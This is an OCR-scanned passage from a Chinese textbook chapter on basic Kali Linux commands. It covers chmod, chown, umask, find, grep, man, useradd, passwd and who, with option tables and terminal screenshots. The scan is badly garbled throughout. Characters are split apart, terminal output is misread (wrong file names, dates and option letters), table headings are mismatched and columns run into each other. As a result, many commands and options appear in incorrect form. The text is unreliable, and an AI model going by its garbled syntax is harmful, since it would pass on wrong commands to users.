Pe 级 : 文件 拥有 者 、 群 组 、 其 他 。 利 用 chmod 
命令 可 以 修改 文件 的 权限 。 命 令 语法 格式 
4.5 权限 分 配 操作 命令 加 和 
chmod [{ugoa}{+-=} {rwx}] [文件 或 目录 ] 
Kali Linux 系 统 对 于 权限 的 分 配 是 非常 [mode=421 ] [文件 或 目录 ] 


严格 的 ， 通 过 不 同 权限 分 配 来 达到 系统 分 命令 中 选项 的 参数 介绍 见 下 表 。 
级 管理 ， 这 样 做 的 目的 不 但 是 为 了 系统 更 
表 ”chmod 命 令 参数 介绍 


选 项 人 
u 表示 该 文件 的 拥有 者 
g 表示 与 该 文件 的 拥有 者 属于 同一 个 群体 (group) 者 
0 表示 其 他 以 外 的 人 
a 表示 这 三 者 皆 是 
十 表示 增加 权限 
- 表示 取消 权限 
= 表示 唯一 设 定 权限 
过 表示 可 读 取 
Ww 表示 可 写 入 
x 表示 可 执行 
党 表示 只 有 当 该 文件 是 个 子 目录 或 者 该 文件 已 经 被 设 定 过 为 可 执行 


SS 
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续 表 
选 项 六 ”我 
< 若 该 文件 权限 确实 已 经 更 改 ， 才 显示 其 更 改动 作 
Es 若 该 文件 权限 无 法 被 更 改 也 不 要 显示 错误 信息 
-V 显示 权限 变更 的 详细 资料 
及 对 目前 目录 下 的 所 有 文件 与 子 目录 进行 相同 的 权限 变更 〈 以 递 回 的 方式 逐个 变更 ) 
--help 显示 辅助 说 明 
--Version 显示 版 本 


下 图 为 Kali Linux 中 权限 之 间 的 关系 。 


字符 表示 r | w r |w| x r | w x 
数字 表示 | 4 | 2 4|2| 1 4 | 2 1 
权限 分 配 文件 所 有 者 文件 所 属 组 其 他 用 户 


尽管 在 Kali Linux 系 统 中 一 切 都 是 文 
件 ， 但 是 每 个 文件 的 类 型 不 尽 相 同 ， 因 此 
Kali Linux 系 统 使 用 了 不 同 的 字符 来 加 以 区 
分 ， 常 见 的 字符 见 下 表 。 
表 常见 的 字符 


普通 文件 
目录 文件 
链接 文件 
块 设备 文件 
字符 设备 文件 
管道 文件 
例如 : 使 用 chmod 命 令 修改 文件 权限 ， 
使 文件 具有 可 执行 权限 ， 下 图 为 执行 效果 。 


上 Eee 和 SUE Temp# TS -Ta 
总 用 量 8 


rwxr-xr-x 2 root root 46996 16 月 39 23:37 
drwxr-xr-x 36 root root 4996 16 月 36 22:48 
-rwxr-xr-x 1 root root 9 16 月 30 22:48 682.tx1 
temp# chmod 755 991-txt 

temp# ls -la 


root@kali: 
root@kali: 
总 用 量 8 
drwxr-xr-x 2 root root 4996 19 月 39 23:37 
drwxr-xr-x 36 root root 4996 16 月 30 22:48 
-FrWXF-Xr-X 1 root root 9 16 月 30 22:48 B01 .tx 


例如 ， 使 用 chmod 命 令 修改 文件 权限 ， 
取消 可 执行 权限 ， 下 图 为 执行 效果 。 


Foot@kali:~/tenp# Chmod U-X 961.txt 
Foot@kali:~/temp# ls -la 

总 用 量 8 

Hrwxr-xr-x 2 root root 4696 16 月 38 23:37 
Hrwxr-xr-x 30 root root 4996 19 月 30 22:48 
Le 
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4.5.2 chown 


Kali Linux/Unix 是 多 人 多 工 操 作 系 统 ， 
每 个 文件 都 有 所 有 者 ，chown 将 指定 文件 的 
所 有 者 为 指定 的 用 户 或 组 ， 用 户 可 以 是 用 
户 名 或 者 用 户 ID， 可 以 是 组 名 或 者 组 ID 。 
文件 是 以 空格 分 开 的 要 改变 权限 的 文件 列 
表 ， 支 持 通配符 。 

一 般 来 说 ， 这 个 指令 只 有 是 由 系统 管 
理 者 〈root) 所 使 用 ， 一 般 使 用 者 没有 权限 
可 以 改变 别人 的 文件 拥有 者 ， 也 没有 权限 
可 以 自己 的 文件 拥有 者 改 设 为 别人 。 只 有 
系统 管理 者 (root) 才 有 这 样 的 权限 。 命 令 
语法 格式 如 下 : 

[用 户 ] [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”trs 命 令 参数 介绍 
含 义 
新 的 文件 拥有 者 的 使 用 者 ID 
新 的 文件 拥有 者 的 使 用 者 组 (group) 
显示 更 改 的 部 分 的 信息 
忽略 错误 信息 
修复 符号 链接 
显示 详细 的 处 理 信息 


处 理 指定 目录 以 及 其 子 目录 下 的 所 有 
交 件 


chown 命 令 的 作用 是 修改 文件 的 所 有 
者 ， 例 如 : 修改 文件 test 001.txt 所 有 者 ， 使 
用 “chown test 001.txt” 命 令 ， 执 行 效果 如 
下 图 所 示 。 


chown 


drwxr-xr-x 2 root root 4996 16 月 38 23:37 
drwxr-xr-x 36 root root 4696 16 月 30 22:48 
-rw-r-xr-x 1 root root 616 月 36 22:48 901.txt 
root@kali:~/temp# chown test 961.txt 
root@kali:-/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4996 16 月 39 23:37 
drwxr-xr-x 36 root root 4996 16 月 30 22:48 
-rw-r-xr-xX 1 test root 9 _ 16 月 36 22:48 B03. txd 


4.5.3 chgrp 
Kali Linux 系 统 中 的 chgrp 命 令 用 于 变更 
文件 或 目录 的 所 属 群 组 。 在 UNIX 系 统 家 族 


里 ， 文 件 或 目录 权限 的 掌控 以 所 有 者 及 所 属 
群 组 来 管理 ， 用 户 可 以 使 用 chgrp 指 令 去 变 
更 文件 与 目录 的 所 属 群 组 ， 设 置 方式 采用 群 
组 名 称 或 群 组 ID。 命 令 语 法 格式 如 下 : 


chgrp [用 户 组 ] [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 trs 命 令 参 数 介绍 
选 项 含 义 
i 效果 类 似 “-v” 选 项 ， 但 仅 回 
报 更 改 的 部 分 
-或 --quiet 或 --silent 不 显示 错误 信息 
-h 或 --no-dereference 昂 浊 符号 注 按 的 严 件 仇人 SK 
而 不 更 动 其 他 任何 相关 文件 


递归 处 理 ， 将 指定 目录 下 的 所 
有 文件 及 子 目录 一 并 处 理 


-RR 或 --recursive 


-Vv 或 --verbose 显示 指令 执行 过 程 
--help 在 线 帮助 
加 把 指定 文件 或 目录 的 所 属 群 组 
Te “多 和 | 全 部 设 成 和 参考 文件 或 目录 的 
所 属 群 组 相同 
--Version 显示 版 本 信息 


chgrp 命 令 同 修改 文件 所 有 者 类 似 ， 
一 个 用 于 修改 用 户 ， 一 个 则 用 于 修改 所 属 
组 ， 例 如 : 使 用 chgrp 修 改 文件 所 属 组 ， 下 
图 为 执行 效果 。 


root@kali:-/temp# ls -la 
总 用 量 8 


drwxr-xr-x 2 root root 4996 19 月 39 23:37 
drwxr-xr-x 39 root root 4996 19 月 39 22:48 
-rw-r-xr-x 1 test root 9 16 月 39 22:48 9801, txt 
roote@kati:-/temp# chgrp test 991.txt 
root@kali:~/temp# LS -la 

总 用 量 

drwxr-xr-x 2 root root 4696 16 月 36 23:37 
drwxr-xr-x 39 root root 4996 16 月 396 22:48 
-rw-r-xr-x 1 test test 616 月 36 22:48 001 txt 
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4.5.4 umask 


Kali Linux 系 统 中 的 umask 命 令 指定 在 用 
建立 文件 时 预 设 的 权限 掩 码 。umask 可 用 
来 设 定 权 限 掩 码 。 权 限 掩 码 是 由 3 个 八进制 
的 数字 所 组 成 ， 将 现 有 的 存 取 权 限 减 掉 权 
限 掩 码 后 ， spa 
限 。 命 令 语法 格式 如 下 : 

umask [-S] 

命令 中 选项 参数 -S$， 表 示 以 rwx 形 式 显 
示 新 建文 件 默 认 权限 

例如 : 执行 umask 命 令 可 以 查看 默认 权 
限 ， 下 图 为 命令 执行 效果 。 

root@kali: 
6622 


root@kali:~/temp# umask -S 
u=rwx,g=rx,o=rx 


temp# umask 


侈 注 意 : 默认 权限 的 计算 方式 为 drwxr- 
XI-X=777-022=755。 


4.6 ”文本 搜索 操作 命令 


随 着 操作 系统 的 使 用 时 间 加 长 ， 系 统 
中 会 存放 大 量 的 文件 信息 ， 如 何 快速 定位 
到 某 个 文件 这 就 需要 使 用 文件 搜索 指令 。 


4.6.1 find 
Kali Linux 系 统 中 的 fnd 命 令 用 来 在 指定 加 和 


目录 下 查找 文件 ， 任 何 位 于 参数 之 前 的 字 
符 串 都 将 被 视 为 欲 查 找 的 目录 名 。 如 果 使 
用 该 命令 时 ， 不 设置 任何 选项 ， 则 find 命 令 
将 在 当前 目录 下 查找 子 目录 与 文件 ， 并 且 将 
查找 到 的 子 目录 和 文件 全 部 进行 显示 。 命 令 
语法 格式 如 下 : 

find 
[ -ezxec 


Path 
-ok 


-option [ =prant 
command ] Ce 


find 命 令 根 据 下 列 规则 判断 path 和 expres- 
sion， 在 命令 列 上 第 一 个 “-( ),!” 之 前 的 部 
分 为 path， 之 后 的 是 expression。 如 果 path 是 
空 字符 串 则 使 用 目前 路 径 ， 如 果 expression 
是 空 字符 串 则 使 用 -print 为 预 设 expression 。 


和 
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表达 式 中 可 使 用 的 选项 有 二 三 十 个 之 多 ， 在 此 只 介绍 最 常 


的 部 分 ， 见 下 表 。 


表 表达 式 中 可 使 用 的 选项 


选 项 阁 包 
-mount -xdev 只 检查 和 指定 目录 在 同一 个 文件 系统 下 的 文件 ， 避 免 列 出 其 他 文件 系统 中 的 文件 
-amin n 在 过 去 n 分 钟 内 被 读 取 过 的 的 文件 
-anewer file 比 文件 fle 更 晚 被 读 取 过 的 文件 
-atime n 在 过 去 n 天 内 被 读 取 过 的 文件 
-cminn 在 过 去 n 分 钟 内 被 修改 过 的 文件 
-cnewer file 比 文件 fe 更 新 的 文件 
-ctimen 在 过 去 n 天 内 被 修改 过 的 文件 
-empty 空 的 文件 
-gid n or -group name id 是 n 或 是 group 名 称 是 name 的 文件 


-ipath p, -path p 


-name name, -iname name 


-Size mn 


路 径 名 称 符合 p 的 文件 ，ipath 会 忽略 大 小 写 
文件 名 称 符 合 name 的 文件 。iname 会 忽略 大 小 写 
文件 大 小 是 n 单 位 ，b 代 表 512 位 元 组 的 区 块 ，c 表 示 字 元 数 ，k 表 示 kilo bytes，w 是 二 


个 位 元 组 
搜索 指定 类 型 的 文件 ， 其 中 d 代 表 目 录 文 件 ，c 代 表 字 符 设备 文件 ，b 代 表 快 设备 文 
-typec 件 ; p 代 表 管道 文件 ，f 代 表 普通 文件 ，1 代 表 符 号 链接 文件 ，s 代 表 socket 文 件 用 于 网 
络 通信 链接 的 文件 
-pidn 进程 id 是 n 的 文件 


下 面 举 例 说 明 find 命 令 的 使 用 方法 : 

例如 : 使 用 find /etc -name init 命 
令 ， 在 目录 /etc 中 查找 文件 init， 下 图 为 命 
令 执行 效果 ， 使 用 -iname 不 区 分 大 小 写 。 


Iroot@kali:~/temp# find /etc -name init 
/etc/apparmor/init 
/etc/init 


例如 : 使 用 find / -size +204800 命 令 ， 
在 根 目录 下 查找 大 于 100MB 的 文件 ， 下 图 
为 命令 执行 效果 ， 其 中 +n 大 于 、-n 小 于 、n 


root@kali:~/temp# ls -Ta 
8 


drwxr-xr-x 2 root root 4696 16 月 36 23:37 
drwxr-xr-x 36 root root 4996 16 月 36 22:48 
-rw-r-xr-xX 1 test test 9 16 月 39 22:48 9001, txt 
root@kali:-/temp# find /root/temp -user test 
/root/temp/991.txt 


例如 : 使 用 find / -cmin -5 命令 ， 在 根 
目录 下 查找 5 分 钟 内 被 修改 过 属性 的 文件 和 
目录 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# find / 
/proc/1977/task/1988/fd/34 
/proc/1717/task/1717/fd/6 
/proc/1717/task/1717/fdinfo/6 


-cmin 


等 于 。 /proc/1718 
/proc/1718/task 

Foot@kali: ~/tenp# Tind / -size +204860 /proc/1718/task/1718 

/proc/kcore 

find: “/proc/1715/task/1715/fd/6': 没有 那个 文件 或 目录 /proc/1718/task/1718/fd 

find: “/proc/1715/task/1715/fdinfo/6": 没有 那个 文件 或 目录 

find: “/proc/1715/fd/5': 没有 那个 文件 或 目录 


上 find: “/proc/1715/fdinfo/5': 没有 那个 文件 或 目录 
Jsysy/devices/pcig999:66/9996:69:9f.6/resourcel 
Usys/devices/pcig999:699/9996:699:9f.6/resourcel_wc 


例如 : 使 用 find Moottemp -user test 
命令 ， 在 /root/temp 目 录 下 查找 所 有 者 为 test 
的 文件 ， 下 图 为 命令 执行 效果 ，-group 根 据 
所 属 组 查找 。 
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例如 : 使 用 find /etc -size +1024 -a -size 
-204800 命 令 ， 在 /etc 下 查找 大 于 0.5MB 小 于 
100MB 的 文件 ， 下 图 为 命令 执行 效果 。-a 两 
个 条 件 同时 满足 ，-o 两 个 条 件 满足 任意 一 个 
即 可 。 


第 4 章 


[root@kali:~/temp# find /etc -size +1924 -a -size -264866 


/etc/ssh/moduli 


|/etc/netsniff-ng/oui.conf 


例如 : 使 用 find /etc -name inittab -exec 
ls -1 {} \ 命令 ， 在 /etc 下 查找 pam.d 目 录 中 
的 文件 并 显示 其 详细 信息 ， 下 图 为 命令 执 
行 效果 。 


[PootOra UI TenpY Tind 7ete -rane amd exec ts -Us 
总 用 量 140 


r-- 1 roor root 384 9 月 27 2817 chfn 
r-- 1 root root 92 3 月 27 2017 chpasswd 
r- 1 root root 581 3 月 27 2617 chsh 

1 roort root 1298 16 月 B 91:92 common-account 
1 root root 1221 16 月 8 01:02 connon-auth 


1 root root 1486 16 月 6 01:02 comnon-password 
--r-- 1 root root 1189 16 月 B 61:92 connon-session 
rw-r--r-- 1 root root 1154 6 月 B 01:02 connon-session-noninteractive 


4.6.2 


locate 


Kali Linux 系 统 中 的 locate 命 令 用 于 查找 
符合 条 件 的 文档 ， 它 会 去 保存 文档 和 目录 
名 称 的 数据 库 内 ， 查 找 符 合 范 本 样式 条 件 
的 文档 或 目录 ， 一 般 情况 输入 locate your_ 
file_name 即 可 查找 指定 文件 。 命 令 语 法 格 
式 如 下 : 


locate [-d ][--help][--version] [范本 
样式 ...] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 locate 命 令 参数 介绍 
选 项 含义 


配置 locate 指 令 使 用 的 数据 库 ， 默 
认 locate 指 令 预 设 的 数据 库 位 于 /var/ 
lib/slocate 目 录 里 ， 文 档 名 为 slocate. 
db， 当 然 也 可 以 使 用 这 个 选项 另行 


-d 或 --database= 


指定 
--help 在 线 帮助 
--Version 显示 版 本 信息 


侈 提示 : locate 与 find 不 同 ，find 是 在 硬盘 中 
寻找 ，locate 只 在 /varlib/slocate 资 料 库 中 寻 
找 。locate 的 速度 比 find 快 ， 它 并 不 是 真 的 
查找 ， 而 是 查 数据 库 ， 一 般 文 件数 据 库 在 
/var/lib/slocate/slocate.db 中 ， 所 以 locate 的 查 
找 并 不 是 实时 的 ， 而 是 以 数据 库 的 更 新 为 
准 ， 一 般 是 系统 自己 维护 ， 也 可 以 人 工 升 
级 数据 库 ， 命 令 为 locate -u。 
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例如 : 使 用 locate inittab 命 令 ， 查 找 init- 
tab 字 段 的 文件 ， 下 图 为 命令 执行 效果 。 
root@kali:~/temp# TOCate inittab | 
/usr/share/terminfo/a/ansi+inittabs 
/usr/share/vim/vim81/syntax/inittab. vim 


4.6.3 which 


Kali Linux 系 统 中 的 which 命 令 用 于 查 E 
找 文件 ，which 指 令 会 在 环境 变量 $8PATH 
设置 的 目录 里 查找 符合 条 件 的 文件 。 命 令 
语法 格式 如 下 : 

which [文件 ...] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 ”trs 命 令 参数 介绍 
含 义 


指定 文件 名 长 度 ， 指 定 的 长 度 必 
须 大 于 或 等 于 所 有 文件 中 最 长 的 
文件 名 


与 -0 参数 相同 ， 但 此 处 的 < 文件 名 
长 度 > 包括 了 文件 的 路 径 


-W 指定 输出 时 栏 位 的 宽度 
a 显示 版 本 信息 

例如 : 使 用 which 命 令 搜 索 命令 所 在 
路 径 ， 执 行 which ls 命令 ， 下 图 为 命令 执行 
效果 。 


root@kali: 
/usr/bin/ls 


选 项 


-n< 文 件 名 长 度 > 


-p< 文件 名 长 度 > 


/temp# which 本 


4.6.4 whereis 


Kali Linux 系 统 中 的 whereis 命 令 用 于 查 交 村 


找 文件 。 该 指令 会 在 特定 目录 中 查找 符合 
条 件 的 文件 。 这 些 文件 应 属于 原始 代码 、 
二 进 制 文件 ， 或 是 帮助 文件 。 不 过 ， 该 指 
令 只 能 用 于 查找 二 进 制 文 件 、 源 代码 文 
件 和 man 手 册页 ， 一 般 文 件 的 定位 需 使 用 
locate 命 令 。 命 令 语法 格式 如 下 : 


whereis [-bfmsu] [-B < 目录 >...][-M < 目 
|| ee :| ei | 


命令 中 选项 的 参数 介绍 见 下 表 。 


pa 
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表 whereis 命 令 参数 介绍 


4.6.5 grep 


含义 Kali Linux 系 统 中 的 grep 命 令 用 于 查 
和 找 文件 里 符合 条 件 的 字符 串 ， 其 查找 的 内 

只 在 设置 的 目录 下 查找 二 进 制 文件 ee i 
人 容 包含 指定 的 范本 样式 文件 ， 如 果 发 现 革 
二 大 文件 的 内 容 符合 所 指定 的 范本 样式 ， 预 设 
-M< 目 录 > | 只 在 设置 的 目录 下 查找 说 明文 件 grep 指 令 会 把 含有 范本 样式 的 那 一 列 显示 出 
-s 只 查找 原始 代码 文件 来 。 若 不 指定 任何 文件 名 称 ， 或 是 所 给 予 
-S< 目 录 > ”| 只 在 设置 的 目录 下 查找 原始 代码 文件 的 文件 名 为 “-”， 则 grep 指 令 会 从 标准 输 


-lh 查找 不 包含 指定 类 型 的 文件 


例如 : 使 用 whereis 命 令 搜索 命令 及 帮 
助 文档 所 在 路 径 ， 执 行 whereis ls 命令 ， 下 


图 为 命令 执行 效果 。 


ep temp# whereis TS 


s: /usr/bin/ls /usr/share/man/manl/ls.1.g9z 


选 项 
-a 或 --text 
-A< 显 示 行 数 > 或 --after-context=< 显 示 
行 数 > 
-b 或 --byte-offset 
-B< 显 示 行 数 > 或 --before-context=< 显 
示 行 数 > 
-或 --count 


-C< 显 示 行 数 > 或 --context=< 显 示 行 数 
> 或 -< 显示 行 数 > 


-d < 动作 > 或 --directories=< 动 作 > 


入 设备 读 取 数 据 。 命 令 语法 格式 如 下 : 


grep [-abcEFGhHilLnqrsvVwxy] [-R< 显 示 
列 数 >] [-B< 显 示 列 数 >] [-C< 显 示 列 数 >] [-d< 进 行动 
作 >] [-e< 范 本 样式 >] [-f< 范 本 文件 >] [--help] [ 范 
本 样式 ] [文件 或 目录 ...] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 grep 命 令 参数 介绍 
含 义 
不 要 忽略 二 进 制 的 数据 
除了 显示 符合 范本 样式 的 那 一 列 之 外 ， 并 显示 该 行 之 后 的 内 容 


在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 出 该 行 第 一 个 字符 的 编号 


除了 显示 符合 样式 的 那 一 行 之 外 ， 并 显示 该 行 之 前 的 内 容 
计算 符合 样式 的 列 数 


除了 显示 符合 样式 的 那 一 行 之 外 ， 并 显示 该 行 之 前 后 的 内 容 


当 指定 要 查找 的 是 目录 而 非 文件 时 ， 必 须 使 用 这 项 参数 ， 否 则 grep 指 令 将 
回报 信息 并 停止 动作 


-e< 范 本 样式 > 或 -regexp=< 范 本 样式 > | 指定 字符 串 作为 查找 文件 内 容 的 样式 
-E 或 --extended-regexp 将 样式 为 延伸 的 普通 表示 法 来 使 用 


-人 < 规则 文件 > 或 -file=< 规 则 文件 > 


指定 规则 文件 ， 其 内 容 含有 一 个 或 多 个 规则 样式 ， 让 grep 查 找 符合 规则 条 
件 的 文件 内 容 ， 格 式 为 每 行 一 个 规则 样式 


-或 --fixed-regexp 
-G 或 --basic-regexp 


将 样式 视 为 固定 字符 串 的 列表 
将 样式 视 为 普通 的 表示 法 来 使 用 


-或 --no-filename 


在 显示 符合 样式 的 那 一 行 之 前 ， 不 标示 该 行 所 属 的 文件 名 称 


-也 或 --with-filename 


在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 该 行 所 属 的 文件 名 称 


-i 或 --ignore-case 


忽略 字符 大 小 写 的 差别 


-1 或 --file-with-matches 


列 出 文件 内 容 符合 指定 的 样式 的 文件 名 称 


工 或 --files-without-match 


列 出 文件 内 容 不 符合 指定 的 样式 的 文件 名 称 


-0 或 --line-number 
-q 或 --quiet 或 --silent 


在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 出 该 行 的 列 数 编号 
不 显示 任何 信息 
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续 表 
选 项 含 义 

工 或 -Tecursive 此 参数 的 效果 和 指定 “-d recurse” 参 数 相同 
-S 或 -no-messages 不 显示 错误 信息 
-VY 或 --revert-match 显示 不 包含 匹配 文本 的 所 有 行 
-V 或 --version 显示 版 本 信息 
-W 或 --word-regexp 只 显示 全 字符 合 的 列 
-x --line-regexp 只 显示 全 列 符合 的 列 
-y 此 参数 的 效果 和 指定 “-i” 参 数 相同 

例如 : 使 用 grep 命 令 筛选 出 符合 条 件 4.6.7 help 


的 文本 内 容 ， 执 行 grep asp /etc/services 命 

令 ， 下 图 为 命令 执行 效果 。 

FT 7 tony rcp -656 7EEC7SETVIEE5 
te 


L 4 Address Search protocol 
hsp 27374/udp 


4.6.6 man 

man 命 令 是 Kali Linux 系 统 中 的 帮助 指 
令 ， 通 过 man 指 令 可 以 查看 Kali Linux 中 的 
指令 帮助 、 配 置 文件 帮助 和 编程 帮助 等 信 
息 。 命 令 语法 格式 如 下 : 
命令 或 配置 文件 ] 

项 的 参数 介绍 见 下 表 。 

表 ”grep 命 令 参数 介绍 


在 所 有 的 man 帮 助手 册 中 搜索 


等 价 于 whatis 指 令 ， 显 示 给 定 关 键 字 的 简 
短 描述 信息 


了 了 | 指定 内 容 时 使 用 分 页 程序 


-M 指定 man 手 册 搜 索 的 路 径 


例如 : 使 用 man 命 令 ， 查 看 ls 的 帮助 信 
息 ， 下 图 为 命令 执行 效果 。 


[ex 
| 
NANE 


User Commands ER 


1s -tst directory contents 


Srnopsrs 
| 1s IDPTID] ,. 


[ELE]... 


pescRIPTIoN 
List nfo bout the FLES CYhe current directory by de 人 

全 Par 

人 ed 


Wandatory argunents to long options are mandatory for short optiond 
too. 


-a，--aLL 
dp not ignore entries starting with . 


A 
Dt Hot ag ,0s 


-author 


help 为 内 置 指令 帮助 命令 ， 多 数 指令 加 
都 提供 了 内 置 的 帮助 手册 ， 如 果 忘记 某 个 
指令 的 操作 方法 ， 可 以 使 用 help 查 看 帮助 信 
息 。 命 令 语法 如 下 : 


help 命令 


例如 ， 使 用 help umask 命 令 ， 查 看 
umask 的 帮助 信息 ， 下 图 为 命令 执行 效果 。 


FoTORaLI /tenp# nelp Unask 
bmask: umask [-p] [-S] [模式 ] 
显示 或 设 定 文件 模式 掩 码 。 


设 定 用 户 文件 创建 掩 码 为 MODE 模式 。 如 果 省 略 了 MODE， 则 
打印 当前 掩 码 的 值 。 


如 果 MODE ohh tet py 4 否则 是 一 
chmod(1) 可 接收 的 符号 


如 果 省 略 MODE 模式 ， 以 可 重用 为 输入 的 格式 输入 
以 符号 形式 输出 ， 否则 以 八进制 数 格 式 输出 


,除非 使 用 了 无 效 的 _MODE 模式 或 者 选项 。 


用 户 账户 操作 命令 


任何 操作 系统 都 需要 人 来 使 用 ， 如 
何 创 建 并 管理 账户 ， 便 是 本 节 要 学 习 的 
内 容 。 


4.7 


4.7.1 useradd 


Kali Linux 系 统 中 的 useradd 命 令 用 于 建 间 
立 用 户 账号 。 账 号 建 好 之 后 ， 再 用 passwd 
设 定 账号 的 密码 ， 还 可 用 userdel 删 除 账 
号 ， 使 用 useradd 指 令 所 建立 的 账号 ， 实 际 
上 是 保存 在 /etc/passwd 文 本 文件 中 。 命 令 
语法 格式 如 下 : 
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useradd [-mMnr] [-c < 备注 >] [-d < 登入 目录 >] [-e < 有 效 期 限 >] [-f < 缓冲 天 数 >] [-g < 群 组 >] 
[-G < 群 组 >] [-s <shell>] [-u <uid>] [用 户 帐号 ] 


或 
useradd -D [-b] [-e < 有 效 期 限 >] [-f < 缓冲 天 数 >] [-g < 群 组 >] [-G < 群 组 >] [-s <shel1>] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 useradd 命 令 参数 介绍 
选 项 含 义 
-C< 备 注 > 加 上 备注 文字 。 备 注 文字 会 保存 在 passwd 的 备注 栏 位 中 
-d< 登 录 目 录 > 指定 用 户 登录 时 的 起 始 目录 
二 变更 预 设 值 
-e< 有 效 期 限 > 指定 账号 的 有 效 期 限 
-< 缓冲 天 数 > 指定 在 密码 过 期 后 多 少 天 即 关 闭 该 账号 
-g< 群 组 > 指定 用 户 所 属 的 群 组 
-G< 群 组 > 指定 用 户 所 属 的 附加 群 组 
-m 自动 建立 用 户 的 登录 目录 
-M 不 要 自动 建立 用 户 的 登录 目录 
1n 取消 建立 以 用 户 名 称 为 名 的 群 组 
I 建立 系统 账号 
-s<shell> 指定 用 户 登录 后 所 使 用 的 shell 
-u<uid> 指定 用 户 ID 
例如 : 使 用 useradd test 命 令 可 以 增加 一 或 
个 新 用 户 ， 执行 命令 如 下 : adduser -D [-g default group] [-b 
RE re 
侈 提示 : 新 用 户 增加 成 功 后 无 任何 提示 ， 命令 中 选项 的 参数 介绍 见 下 表 。 
新 用 户 需 要 使 用 passwd 命 令 设置 账号 密 表 adduser 命 令 参数 介绍 
2 选 项 含义 
四 472 adduser ee 


Kali Linux 系 统 中 的 adduser 命 令 用 于 创 
建 用 户 账号 或 更 新 现 有 账号 资料 ，adduser -dhome di 
与 useradd 指 令 为 同一 指令 ， 该 命令 的 使 用 


设 定 使 用 者 的 家 目录 为 home_dir， 预 
设 值 为 预 设 的 home 后 面 加 上 使 用 者 账 
号 loginid 


为 系统 管理 员 。 语 》 设 定 此 账号 的 使 用 期 限 《 格 式 为 
权限 为 系统 管 贝 命令 语法 格式 如 下 -e expire_date YYYYMMDD) ， 预 设 信 为 永久 有 效 
adduser [-c comment] [-d home dir] 
[-e expire date] [-f inactive time] [-g 例如 : 使 用 adduser test2 命 令 ， 创 建 一 
gronp] [6 group[， J】 [EK 个 账号 账号 创建 过 程 中 会 提示 设置 密码 ， 
skeleton airrl | 一 MI [=~p passwdl] [~s 


3 | 还 有 一 些 基本 信息 ， 下 图 为 执行 效果 。 
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oot@kali: ~/tenp# adduser 

dduser : 只 允许 一 个 或 者 两 个 名 字 。 
‘oot@kali:~/temp# adduser test2 

在 添加 用 户 "test2" 
是 在》 添加 新 组 "test2" “ (1001). 

在 添加 新 用 户 "test2"”(1991) 到 组 "test2" 
建 主 目录 "/home/test2" 

在 从 */etc/sket" 复 制 文件 . 
给 入 新 的 UNIX 密码 : 

新 输入 新 的 UNIX 密码 : 

asswd : 已 成 功 更 新 密码 

在 改变 test2 的 用 户 信 息 

和 生生 二 


其 他 []: 
这 些 信 息 是 否 正 确 ? [Y/n] y 


4.7.3 passwd 


Kali Linux 系 统 中 的 passwd 命 令 用 来 修 
改 账号 密码 ， 如 果 使 用 useradd 创 建 的 账户 
默认 是 没有 设置 密码 的 ， 可 以 通过 该 指令 
进行 设置 。 命 令 语法 格式 如 下 : 

Passway [=E] [=2] {=u t=£ t=QY f= 
[username] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 passwd 命 令 参 数 介绍 
选 项 含 义 
-d 删除 密码 
. 强制 执行 
k 更 新 只 能 发 送 在 过 期 之 后 
| 停止 账号 使 用 
-S 显示 密码 信息 
El 启用 已 被 停止 的 账户 
-x 设置 密码 的 有 效 期 
-g 修改 群 组 密码 
-i 过 期 后 停止 用 户 账号 


例如 : 使 用 passwd 命 令 修改 账号 密 


码 ， 下 图 为 命令 执行 效果 。 
|rootG@Kkati:~/temp# passwd test 
输入 新 的 UNIX 密码 : 
重新 输入 新 的 UNIX 密码 : 
passwd : 已 成 功 更 新 密码 


4.7.4 userdel 


userdel 可 删除 用 户 账 号 与 相关 的 文 
件 。 若 不 加 参数 ， 则 仅 删 除 用 户 账号 ， 而 


不 删除 相关 文件 。 命 令 语 法 格式 如 下 : 
userdel [-r] [用 户 账号 ] 


命令 中 选项 的 参数 -r， 表 示 删 除 用 户 登 
入 目录 以 及 目录 中 所 有 文件 。 

根据 实际 需求 选择 相应 的 指令 ， 删 除 账 
户 必须 存在 才 会 有 效果 ， 下 图 为 执行 效果 。 


Footekali: ~-# Which deluser 
/usr/sbin/deluser 
root@kali:-# which userdel 
/usr/sbin/userdel 
Foot@kali:~# useradd test 
root@kali:-# userdel test 
Foot@kali:-~# useradd test 
Foot@kali:-# deluser test 
正在 删除 用 户 'test' 

晨 千 :组 "test" 没有 其 他 成 员 了 

完成 。 


4.7.5 who 


Kali Linux 系 统 中 的 who 命 令 用 于 显示 和 
系统 中 有 哪些 使 用 者 正在 上 面 ， 显 示 的 资 
料 包含 了 使 用 者 ID、 使 用 的 终端 机 、 从 哪 
边 连 上 来 的 、 上 线 时 间 、 呆 滞 时 间 、CPU 
使 用 量 、 动 作 等 。 所 有 使 用 者 都 可 使 用 。 
命令 语法 格式 如 下 : 


who - [husfV] [user] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”who 命令 参数 介绍 


选 项 含 义 
-H 或 -heading 显示 各 栏 位 的 标题 信息 列 

显示 闲置 时 间 ， 若 该 用 户 在 前 
一 分 钟 之 内 有 进行 任何 动作 ， 
-或 -u 或 --idle 将 标示 成 “.” 号 ， 如 果 该 用 户 
已 超过 24 小 时 没有 任何 动作 ， 
则 标示 出 old 字 符 串 
此 选项 的 效果 和 指定 am i 字符 
串 相同 
只 显示 登录 系统 的 账号 名 称 和 
总 人 数 
此 选项 将 忽略 不 予 处 理 ， 仅 负 
-Ss 责 解决 who 指 令 其 他 版 本 的 兼 
容 性 问题 


-Ww 或 -或 --mesg 或 -- 


message 或 --writable 


例如 : 使 用 who 命 令 查看 当前 账户 信 


显示 用 户 的 信息 状态 栏 
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盟 息 ， 下 图 为 执行 效果 。 


ED 
2618-19-36 22:44 (:1) 

Iroot@kali:~/temp# su test2 

test2@kali: /root/temp$ who 

root : 2018-10-30 22:44 (:1) 


